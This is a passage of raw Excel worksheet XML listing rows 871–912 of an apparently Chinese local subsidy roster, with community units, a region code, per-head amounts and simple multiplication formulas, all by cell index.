        <v>355</v>
      </c>
      <c r="I871" s="17">
        <f>H871*G871</f>
        <v>710</v>
      </c>
      <c r="J871" s="29">
        <v>45108</v>
      </c>
      <c r="K871" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="872" customHeight="1" spans="1:11">
      <c r="A872" s="16" t="s">
        <v>2341</v>
      </c>
      <c r="B872" s="17" t="str">
        <f>B871</f>
        <v>城关镇</v>
      </c>
      <c r="C872" s="17" t="str">
        <f>C871</f>
        <v>中华社区粮食局</v>
      </c>
      <c r="D872" s="27" t="s">
        <v>2342</v>
      </c>
      <c r="E872" s="27" t="s">
        <v>1284</v>
      </c>
      <c r="F872" s="17" t="str">
        <f>F871</f>
        <v>4113210108</v>
      </c>
      <c r="G872" s="17"/>
      <c r="H872" s="17"/>
      <c r="I872" s="17"/>
      <c r="J872" s="29"/>
      <c r="K872" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="873" customHeight="1" spans="1:11">
      <c r="A873" s="16" t="s">
        <v>2343</v>
      </c>
      <c r="B873" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C873" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D873" s="17" t="s">
        <v>2344</v>
      </c>
      <c r="E873" s="17" t="s">
        <v>2345</v>
      </c>
      <c r="F873" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G873" s="17">
        <v>1</v>
      </c>
      <c r="H873" s="18">
        <v>365</v>
      </c>
      <c r="I873" s="17">
        <f t="shared" ref="I873:I879" si="43">H873*G873</f>
        <v>365</v>
      </c>
      <c r="J873" s="29">
        <v>45108</v>
      </c>
      <c r="K873" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="874" customHeight="1" spans="1:11">
      <c r="A874" s="16" t="s">
        <v>2346</v>
      </c>
      <c r="B874" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C874" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D874" s="17" t="s">
        <v>2348</v>
      </c>
      <c r="E874" s="17" t="s">
        <v>2349</v>
      </c>
      <c r="F874" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G874" s="17">
        <v>1</v>
      </c>
      <c r="H874" s="18">
        <v>365</v>
      </c>
      <c r="I874" s="17">
        <f t="shared" si="43"/>
        <v>365</v>
      </c>
      <c r="J874" s="29">
        <v>45108</v>
      </c>
      <c r="K874" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="875" customHeight="1" spans="1:11">
      <c r="A875" s="16" t="s">
        <v>2350</v>
      </c>
      <c r="B875" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C875" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D875" s="17" t="s">
        <v>2351</v>
      </c>
      <c r="E875" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F875" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G875" s="17">
        <v>1</v>
      </c>
      <c r="H875" s="18">
        <v>365</v>
      </c>
      <c r="I875" s="17">
        <f t="shared" si="43"/>
        <v>365</v>
      </c>
      <c r="J875" s="29">
        <v>45108</v>
      </c>
      <c r="K875" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="876" customHeight="1" spans="1:11">
      <c r="A876" s="16" t="s">
        <v>2352</v>
      </c>
      <c r="B876" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C876" s="17" t="s">
        <v>2336</v>
      </c>
      <c r="D876" s="17" t="s">
        <v>2353</v>
      </c>
      <c r="E876" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F876" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G876" s="17">
        <v>1</v>
      </c>
      <c r="H876" s="18">
        <v>365</v>
      </c>
      <c r="I876" s="17">
        <f t="shared" si="43"/>
        <v>365</v>
      </c>
      <c r="J876" s="29">
        <v>45108</v>
      </c>
      <c r="K876" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="877" customHeight="1" spans="1:11">
      <c r="A877" s="16" t="s">
        <v>2354</v>
      </c>
      <c r="B877" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C877" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D877" s="17" t="s">
        <v>2355</v>
      </c>
      <c r="E877" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F877" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G877" s="17">
        <v>1</v>
      </c>
      <c r="H877" s="18">
        <v>365</v>
      </c>
      <c r="I877" s="17">
        <f t="shared" si="43"/>
        <v>365</v>
      </c>
      <c r="J877" s="29">
        <v>45108</v>
      </c>
      <c r="K877" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="878" customHeight="1" spans="1:11">
      <c r="A878" s="16" t="s">
        <v>2356</v>
      </c>
      <c r="B878" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C878" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D878" s="17" t="s">
        <v>2357</v>
      </c>
      <c r="E878" s="17" t="s">
        <v>2358</v>
      </c>
      <c r="F878" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G878" s="17">
        <v>1</v>
      </c>
      <c r="H878" s="18">
        <v>365</v>
      </c>
      <c r="I878" s="17">
        <f t="shared" si="43"/>
        <v>365</v>
      </c>
      <c r="J878" s="29">
        <v>45108</v>
      </c>
      <c r="K878" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="879" customHeight="1" spans="1:11">
      <c r="A879" s="16" t="s">
        <v>2359</v>
      </c>
      <c r="B879" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C879" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D879" s="17" t="s">
        <v>2360</v>
      </c>
      <c r="E879" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F879" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G879" s="17">
        <v>2</v>
      </c>
      <c r="H879" s="18">
        <v>325</v>
      </c>
      <c r="I879" s="17">
        <f t="shared" si="43"/>
        <v>650</v>
      </c>
      <c r="J879" s="29">
        <v>45108</v>
      </c>
      <c r="K879" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="880" customHeight="1" spans="1:11">
      <c r="A880" s="16" t="s">
        <v>2361</v>
      </c>
      <c r="B880" s="17" t="str">
        <f>B879</f>
        <v>城关镇</v>
      </c>
      <c r="C880" s="17" t="str">
        <f>C879</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D880" s="16" t="s">
        <v>2362</v>
      </c>
      <c r="E880" s="16" t="s">
        <v>303</v>
      </c>
      <c r="F880" s="17" t="str">
        <f>F879</f>
        <v>4113210108</v>
      </c>
      <c r="G880" s="17"/>
      <c r="H880" s="17"/>
      <c r="I880" s="17"/>
      <c r="J880" s="29"/>
      <c r="K880" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="881" customHeight="1" spans="1:11">
      <c r="A881" s="16" t="s">
        <v>2363</v>
      </c>
      <c r="B881" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C881" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D881" s="17" t="s">
        <v>2365</v>
      </c>
      <c r="E881" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F881" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G881" s="17">
        <v>1</v>
      </c>
      <c r="H881" s="18">
        <v>365</v>
      </c>
      <c r="I881" s="17">
        <f>H881*G881</f>
        <v>365</v>
      </c>
      <c r="J881" s="29">
        <v>45108</v>
      </c>
      <c r="K881" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="882" customHeight="1" spans="1:11">
      <c r="A882" s="16" t="s">
        <v>2366</v>
      </c>
      <c r="B882" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C882" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D882" s="17" t="s">
        <v>2367</v>
      </c>
      <c r="E882" s="17" t="s">
        <v>360</v>
      </c>
      <c r="F882" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G882" s="17">
        <v>1</v>
      </c>
      <c r="H882" s="18">
        <v>365</v>
      </c>
      <c r="I882" s="17">
        <f>H882*G882</f>
        <v>365</v>
      </c>
      <c r="J882" s="29">
        <v>45108</v>
      </c>
      <c r="K882" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="883" customHeight="1" spans="1:11">
      <c r="A883" s="16" t="s">
        <v>2368</v>
      </c>
      <c r="B883" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C883" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D883" s="17" t="s">
        <v>2369</v>
      </c>
      <c r="E883" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F883" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G883" s="17">
        <v>2</v>
      </c>
      <c r="H883" s="18">
        <v>325</v>
      </c>
      <c r="I883" s="17">
        <f>H883*G883</f>
        <v>650</v>
      </c>
      <c r="J883" s="29">
        <v>45108</v>
      </c>
      <c r="K883" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="884" customHeight="1" spans="1:11">
      <c r="A884" s="16" t="s">
        <v>2370</v>
      </c>
      <c r="B884" s="17" t="str">
        <f>B883</f>
        <v>城关镇</v>
      </c>
      <c r="C884" s="17" t="str">
        <f>C883</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D884" s="16" t="s">
        <v>2371</v>
      </c>
      <c r="E884" s="16" t="s">
        <v>542</v>
      </c>
      <c r="F884" s="17" t="str">
        <f>F883</f>
        <v>4113210108</v>
      </c>
      <c r="G884" s="17"/>
      <c r="H884" s="17"/>
      <c r="I884" s="17"/>
      <c r="J884" s="29"/>
      <c r="K884" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="885" customHeight="1" spans="1:11">
      <c r="A885" s="16" t="s">
        <v>2372</v>
      </c>
      <c r="B885" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C885" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D885" s="17" t="s">
        <v>2373</v>
      </c>
      <c r="E885" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F885" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G885" s="17">
        <v>1</v>
      </c>
      <c r="H885" s="18">
        <v>365</v>
      </c>
      <c r="I885" s="17">
        <f>H885*G885</f>
        <v>365</v>
      </c>
      <c r="J885" s="29">
        <v>45108</v>
      </c>
      <c r="K885" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="886" customHeight="1" spans="1:11">
      <c r="A886" s="16" t="s">
        <v>2374</v>
      </c>
      <c r="B886" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C886" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D886" s="17" t="s">
        <v>2375</v>
      </c>
      <c r="E886" s="17" t="s">
        <v>2376</v>
      </c>
      <c r="F886" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G886" s="17">
        <v>4</v>
      </c>
      <c r="H886" s="18">
        <v>285</v>
      </c>
      <c r="I886" s="17">
        <f>H886*G886</f>
        <v>1140</v>
      </c>
      <c r="J886" s="29">
        <v>45108</v>
      </c>
      <c r="K886" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="887" customHeight="1" spans="1:11">
      <c r="A887" s="16" t="s">
        <v>2377</v>
      </c>
      <c r="B887" s="17" t="str">
        <f>B886</f>
        <v>城关镇</v>
      </c>
      <c r="C887" s="17" t="str">
        <f>C886</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D887" s="23" t="s">
        <v>2378</v>
      </c>
      <c r="E887" s="23" t="s">
        <v>2379</v>
      </c>
      <c r="F887" s="17" t="str">
        <f>F886</f>
        <v>4113210108</v>
      </c>
      <c r="G887" s="17"/>
      <c r="H887" s="17"/>
      <c r="I887" s="17"/>
      <c r="J887" s="29"/>
      <c r="K887" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="888" customHeight="1" spans="1:11">
      <c r="A888" s="16" t="s">
        <v>2380</v>
      </c>
      <c r="B888" s="17" t="str">
        <f>B887</f>
        <v>城关镇</v>
      </c>
      <c r="C888" s="17" t="str">
        <f>C887</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D888" s="23" t="s">
        <v>2381</v>
      </c>
      <c r="E888" s="19" t="s">
        <v>2382</v>
      </c>
      <c r="F888" s="17" t="str">
        <f>F887</f>
        <v>4113210108</v>
      </c>
      <c r="G888" s="17"/>
      <c r="H888" s="17"/>
      <c r="I888" s="17"/>
      <c r="J888" s="29"/>
      <c r="K888" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="889" customHeight="1" spans="1:11">
      <c r="A889" s="16" t="s">
        <v>2383</v>
      </c>
      <c r="B889" s="17" t="str">
        <f>B888</f>
        <v>城关镇</v>
      </c>
      <c r="C889" s="17" t="str">
        <f>C888</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D889" s="23" t="s">
        <v>2384</v>
      </c>
      <c r="E889" s="19" t="s">
        <v>2385</v>
      </c>
      <c r="F889" s="17" t="str">
        <f>F888</f>
        <v>4113210108</v>
      </c>
      <c r="G889" s="17"/>
      <c r="H889" s="17"/>
      <c r="I889" s="17"/>
      <c r="J889" s="29"/>
      <c r="K889" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="890" customHeight="1" spans="1:11">
      <c r="A890" s="16" t="s">
        <v>2386</v>
      </c>
      <c r="B890" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C890" s="17" t="s">
        <v>2339</v>
      </c>
      <c r="D890" s="17" t="s">
        <v>2387</v>
      </c>
      <c r="E890" s="17" t="s">
        <v>2088</v>
      </c>
      <c r="F890" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G890" s="17">
        <v>1</v>
      </c>
      <c r="H890" s="18">
        <v>365</v>
      </c>
      <c r="I890" s="17">
        <f>H890*G890</f>
        <v>365</v>
      </c>
      <c r="J890" s="29">
        <v>45108</v>
      </c>
      <c r="K890" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="891" customHeight="1" spans="1:11">
      <c r="A891" s="16" t="s">
        <v>2388</v>
      </c>
      <c r="B891" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C891" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D891" s="17" t="s">
        <v>2389</v>
      </c>
      <c r="E891" s="17" t="s">
        <v>2390</v>
      </c>
      <c r="F891" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G891" s="17">
        <v>2</v>
      </c>
      <c r="H891" s="18">
        <v>325</v>
      </c>
      <c r="I891" s="17">
        <f>H891*G891</f>
        <v>650</v>
      </c>
      <c r="J891" s="29">
        <v>45108</v>
      </c>
      <c r="K891" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="892" customHeight="1" spans="1:11">
      <c r="A892" s="16" t="s">
        <v>2391</v>
      </c>
      <c r="B892" s="17" t="str">
        <f>B891</f>
        <v>城关镇</v>
      </c>
      <c r="C892" s="17" t="str">
        <f>C891</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D892" s="23" t="s">
        <v>2392</v>
      </c>
      <c r="E892" s="23" t="s">
        <v>2393</v>
      </c>
      <c r="F892" s="17" t="str">
        <f>F891</f>
        <v>4113210108</v>
      </c>
      <c r="G892" s="17"/>
      <c r="H892" s="17"/>
      <c r="I892" s="17"/>
      <c r="J892" s="29"/>
      <c r="K892" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="893" customHeight="1" spans="1:11">
      <c r="A893" s="16" t="s">
        <v>2394</v>
      </c>
      <c r="B893" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C893" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D893" s="17" t="s">
        <v>2395</v>
      </c>
      <c r="E893" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F893" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G893" s="17">
        <v>1</v>
      </c>
      <c r="H893" s="18">
        <v>365</v>
      </c>
      <c r="I893" s="17">
        <f t="shared" ref="I893:I902" si="44">H893*G893</f>
        <v>365</v>
      </c>
      <c r="J893" s="29">
        <v>45108</v>
      </c>
      <c r="K893" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="894" customHeight="1" spans="1:11">
      <c r="A894" s="16" t="s">
        <v>2396</v>
      </c>
      <c r="B894" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C894" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D894" s="17" t="s">
        <v>2397</v>
      </c>
      <c r="E894" s="17" t="s">
        <v>521</v>
      </c>
      <c r="F894" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G894" s="17">
        <v>1</v>
      </c>
      <c r="H894" s="18">
        <v>365</v>
      </c>
      <c r="I894" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J894" s="29">
        <v>45108</v>
      </c>
      <c r="K894" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="895" customHeight="1" spans="1:11">
      <c r="A895" s="16" t="s">
        <v>2398</v>
      </c>
      <c r="B895" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C895" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D895" s="17" t="s">
        <v>2399</v>
      </c>
      <c r="E895" s="17" t="s">
        <v>2255</v>
      </c>
      <c r="F895" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G895" s="17">
        <v>1</v>
      </c>
      <c r="H895" s="18">
        <v>365</v>
      </c>
      <c r="I895" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J895" s="29">
        <v>45108</v>
      </c>
      <c r="K895" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="896" customHeight="1" spans="1:11">
      <c r="A896" s="16" t="s">
        <v>2400</v>
      </c>
      <c r="B896" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C896" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D896" s="17" t="s">
        <v>820</v>
      </c>
      <c r="E896" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F896" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G896" s="17">
        <v>1</v>
      </c>
      <c r="H896" s="18">
        <v>365</v>
      </c>
      <c r="I896" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J896" s="29">
        <v>45108</v>
      </c>
      <c r="K896" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="897" customHeight="1" spans="1:11">
      <c r="A897" s="16" t="s">
        <v>2401</v>
      </c>
      <c r="B897" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C897" s="17" t="s">
        <v>2402</v>
      </c>
      <c r="D897" s="17" t="s">
        <v>2403</v>
      </c>
      <c r="E897" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F897" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G897" s="17">
        <v>1</v>
      </c>
      <c r="H897" s="18">
        <v>365</v>
      </c>
      <c r="I897" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J897" s="29">
        <v>45108</v>
      </c>
      <c r="K897" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="898" customHeight="1" spans="1:11">
      <c r="A898" s="16" t="s">
        <v>2404</v>
      </c>
      <c r="B898" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C898" s="17" t="s">
        <v>2405</v>
      </c>
      <c r="D898" s="17" t="s">
        <v>2406</v>
      </c>
      <c r="E898" s="17" t="s">
        <v>2407</v>
      </c>
      <c r="F898" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G898" s="17">
        <v>1</v>
      </c>
      <c r="H898" s="18">
        <v>365</v>
      </c>
      <c r="I898" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J898" s="29">
        <v>45108</v>
      </c>
      <c r="K898" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="899" customHeight="1" spans="1:11">
      <c r="A899" s="16" t="s">
        <v>2408</v>
      </c>
      <c r="B899" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C899" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D899" s="17" t="s">
        <v>2409</v>
      </c>
      <c r="E899" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F899" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G899" s="17">
        <v>1</v>
      </c>
      <c r="H899" s="18">
        <v>365</v>
      </c>
      <c r="I899" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J899" s="29">
        <v>45108</v>
      </c>
      <c r="K899" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="900" customHeight="1" spans="1:11">
      <c r="A900" s="16" t="s">
        <v>2410</v>
      </c>
      <c r="B900" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C900" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D900" s="17" t="s">
        <v>2411</v>
      </c>
      <c r="E900" s="17" t="s">
        <v>554</v>
      </c>
      <c r="F900" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G900" s="17">
        <v>1</v>
      </c>
      <c r="H900" s="18">
        <v>365</v>
      </c>
      <c r="I900" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J900" s="29">
        <v>45108</v>
      </c>
      <c r="K900" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="901" customHeight="1" spans="1:11">
      <c r="A901" s="16" t="s">
        <v>2412</v>
      </c>
      <c r="B901" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C901" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D901" s="17" t="s">
        <v>2413</v>
      </c>
      <c r="E901" s="17" t="s">
        <v>2414</v>
      </c>
      <c r="F901" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G901" s="17">
        <v>1</v>
      </c>
      <c r="H901" s="18">
        <v>365</v>
      </c>
      <c r="I901" s="17">
        <f t="shared" si="44"/>
        <v>365</v>
      </c>
      <c r="J901" s="29">
        <v>45108</v>
      </c>
      <c r="K901" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="902" customHeight="1" spans="1:11">
      <c r="A902" s="16" t="s">
        <v>2415</v>
      </c>
      <c r="B902" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C902" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D902" s="17" t="s">
        <v>2416</v>
      </c>
      <c r="E902" s="17" t="s">
        <v>2417</v>
      </c>
      <c r="F902" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G902" s="17">
        <v>2</v>
      </c>
      <c r="H902" s="18">
        <v>325</v>
      </c>
      <c r="I902" s="17">
        <f t="shared" si="44"/>
        <v>650</v>
      </c>
      <c r="J902" s="29">
        <v>45108</v>
      </c>
      <c r="K902" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="903" customHeight="1" spans="1:11">
      <c r="A903" s="16" t="s">
        <v>2418</v>
      </c>
      <c r="B903" s="17" t="str">
        <f>B902</f>
        <v>城关镇</v>
      </c>
      <c r="C903" s="17" t="str">
        <f>C902</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D903" s="23" t="s">
        <v>2419</v>
      </c>
      <c r="E903" s="23" t="s">
        <v>2420</v>
      </c>
      <c r="F903" s="17" t="str">
        <f>F902</f>
        <v>4113210108</v>
      </c>
      <c r="G903" s="17"/>
      <c r="H903" s="17"/>
      <c r="I903" s="17"/>
      <c r="J903" s="29"/>
      <c r="K903" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="904" customHeight="1" spans="1:11">
      <c r="A904" s="16" t="s">
        <v>2421</v>
      </c>
      <c r="B904" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C904" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D904" s="17" t="s">
        <v>2422</v>
      </c>
      <c r="E904" s="17" t="s">
        <v>2423</v>
      </c>
      <c r="F904" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G904" s="17">
        <v>1</v>
      </c>
      <c r="H904" s="18">
        <v>365</v>
      </c>
      <c r="I904" s="17">
        <f>H904*G904</f>
        <v>365</v>
      </c>
      <c r="J904" s="29">
        <v>45108</v>
      </c>
      <c r="K904" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="905" customHeight="1" spans="1:11">
      <c r="A905" s="16" t="s">
        <v>2424</v>
      </c>
      <c r="B905" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C905" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D905" s="17" t="s">
        <v>2425</v>
      </c>
      <c r="E905" s="17" t="s">
        <v>595</v>
      </c>
      <c r="F905" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G905" s="17">
        <v>2</v>
      </c>
      <c r="H905" s="18">
        <v>325</v>
      </c>
      <c r="I905" s="17">
        <f>H905*G905</f>
        <v>650</v>
      </c>
      <c r="J905" s="29">
        <v>45108</v>
      </c>
      <c r="K905" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="906" customHeight="1" spans="1:11">
      <c r="A906" s="16" t="s">
        <v>2426</v>
      </c>
      <c r="B906" s="17" t="str">
        <f>B905</f>
        <v>城关镇</v>
      </c>
      <c r="C906" s="17" t="str">
        <f>C905</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D906" s="23" t="s">
        <v>2427</v>
      </c>
      <c r="E906" s="24" t="s">
        <v>476</v>
      </c>
      <c r="F906" s="17" t="str">
        <f>F905</f>
        <v>4113210108</v>
      </c>
      <c r="G906" s="17"/>
      <c r="H906" s="17"/>
      <c r="I906" s="17"/>
      <c r="J906" s="29"/>
      <c r="K906" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="907" customHeight="1" spans="1:11">
      <c r="A907" s="16" t="s">
        <v>2428</v>
      </c>
      <c r="B907" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C907" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D907" s="17" t="s">
        <v>2429</v>
      </c>
      <c r="E907" s="17" t="s">
        <v>668</v>
      </c>
      <c r="F907" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G907" s="17">
        <v>1</v>
      </c>
      <c r="H907" s="18">
        <v>365</v>
      </c>
      <c r="I907" s="17">
        <f>H907*G907</f>
        <v>365</v>
      </c>
      <c r="J907" s="29">
        <v>45108</v>
      </c>
      <c r="K907" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="908" customHeight="1" spans="1:11">
      <c r="A908" s="16" t="s">
        <v>2430</v>
      </c>
      <c r="B908" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C908" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D908" s="17" t="s">
        <v>2431</v>
      </c>
      <c r="E908" s="17" t="s">
        <v>334</v>
      </c>
      <c r="F908" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G908" s="17">
        <v>1</v>
      </c>
      <c r="H908" s="18">
        <v>365</v>
      </c>
      <c r="I908" s="17">
        <f>H908*G908</f>
        <v>365</v>
      </c>
      <c r="J908" s="29">
        <v>45108</v>
      </c>
      <c r="K908" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="909" customHeight="1" spans="1:11">
      <c r="A909" s="16" t="s">
        <v>2432</v>
      </c>
      <c r="B909" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C909" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D909" s="17" t="s">
        <v>2433</v>
      </c>
      <c r="E909" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F909" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G909" s="17">
        <v>2</v>
      </c>
      <c r="H909" s="18">
        <v>325</v>
      </c>
      <c r="I909" s="17">
        <f>H909*G909</f>
        <v>650</v>
      </c>
      <c r="J909" s="29">
        <v>45108</v>
      </c>
      <c r="K909" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="910" customHeight="1" spans="1:11">
      <c r="A910" s="16" t="s">
        <v>2434</v>
      </c>
      <c r="B910" s="17" t="str">
        <f>B909</f>
        <v>城关镇</v>
      </c>
      <c r="C910" s="17" t="str">
        <f>C909</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D910" s="24" t="s">
        <v>2435</v>
      </c>
      <c r="E910" s="24" t="s">
        <v>2436</v>
      </c>
      <c r="F910" s="17" t="str">
        <f>F909</f>
        <v>4113210108</v>
      </c>
      <c r="G910" s="17"/>
      <c r="H910" s="17"/>
      <c r="I910" s="17"/>
      <c r="J910" s="29"/>
      <c r="K910" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="911" customHeight="1" spans="1:11">
      <c r="A911" s="16" t="s">
        <v>2437</v>
      </c>
      <c r="B911" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C911" s="17" t="s">
        <v>2438</v>
      </c>
      <c r="D911" s="17" t="s">
        <v>2439</v>
      </c>
      <c r="E911" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F911" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G911" s="17">
        <v>1</v>
      </c>
      <c r="H911" s="18">
        <v>365</v>
      </c>
      <c r="I911" s="17">
        <f>H911*G911</f>
        <v>365</v>
      </c>
      <c r="J911" s="29">
        <v>45108</v>
      </c>
      <c r="K911" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="912" customHeight="1" spans="1:11">
      <c r="A912" s="16" t="s">
        <v>2440</v>
      </c>
      <c r="B912" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C912" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D912" s="17" t="s">
        <v>2441</v>
      </c>
      <c r="E912" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F912" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G912" s="17">
        <v>1</v>
      </c>
